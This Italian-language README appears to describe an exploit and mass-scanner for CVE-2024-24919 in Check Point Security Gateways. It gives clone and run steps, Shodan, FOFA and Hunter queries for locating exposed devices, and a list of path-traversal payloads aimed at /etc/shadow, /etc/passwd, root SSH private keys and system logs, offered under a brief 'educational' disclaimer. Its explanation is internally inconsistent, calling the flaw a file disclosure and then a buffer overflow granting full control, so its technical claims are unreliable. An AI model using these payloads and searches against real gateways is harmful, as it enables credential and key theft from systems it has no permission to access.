
CVE-2024-24919 exploit
Questo repository contiene uno strumento per sfruttare la vulnerabilità CVE-2024-24919 nei Check Point Security Gateway. Lo strumento è un multi-scanner in grado di identificare dispositivi vulnerabili e un exploit per singolo bersaglio che può prendere il controllo completo del dispositivo interessato.
CVE-2024-24919 è una vulnerabilità di divulgazione di informazioni ad alta gravità che consente a un attaccante di leggere file arbitrari da remoto su un Check Point Security Gateway. Questa vulnerabilità può essere sfruttata per rubare informazioni sensibili, come password e file di configurazione.
Disclaimer:
Questo strumento è fornito solo a scopo educativo. Non deve essere utilizzato per attaccare sistemi vulnerabili senza il consenso esplicito del proprietario. Gli autori di questo strumento non sono responsabili per eventuali danni derivanti dal suo utilizzo.
L'exploit funziona inviando una richiesta HTTP appositamente predisposta al dispositivo vulnerabile. La richiesta innesca un buffer overflow nel firmware del dispositivo, che consente all'attaccante di eseguire codice arbitrario. L'exploit può quindi essere utilizzato per prendere il controllo completo del dispositivo.
git clone https://github.com/your-username/cve-2024-24919.git
cd cve-2024-24919
pip install -r requirements.txt
Puoi scansionare un singolo bersaglio o multipli!
python cve-2024-24919.py
# Hunter
Hunter: /product.name="Check Point SSL Network Extender"
# Shodan
SHODAN: http.title="Check Point SSL Network Extender"
# Fofa Query
FOFA: title="Check Point SSL Network Extender"

$ Percorsi dello strumento :
```
'aCSHELL/../../../../../../../../../../../etc/passwd',
'aCSHELL/../../../../../../../../../../../etc/apache2/apache2.conf',
'aCSHELL/../../../../../../../../../../../etc/mysql/my.cnf',
'aCSHELL/../../../../../../../../../../../var/log/syslog',
'aCSHELL/../../../../../../../../../../../var/log/auth.log',
#'aCSHELL/../../../../../../../../../../../var/log/messages',
'aCSHELL/../../../../../../../../../../../etc/group',
'aCSHELL/../../../../../../../../../../../etc/shadow',
'aCSHELL/../../../../../../../../../../../root/.ssh/id_rsa',
'aCSHELL/../../../../../../../../../../../etc/hostname',
'aCSHELL/../../../../../../../../../../../etc/hosts',
'aCSHELL/../../../../../../../../../../../etc/resolv.conf' ```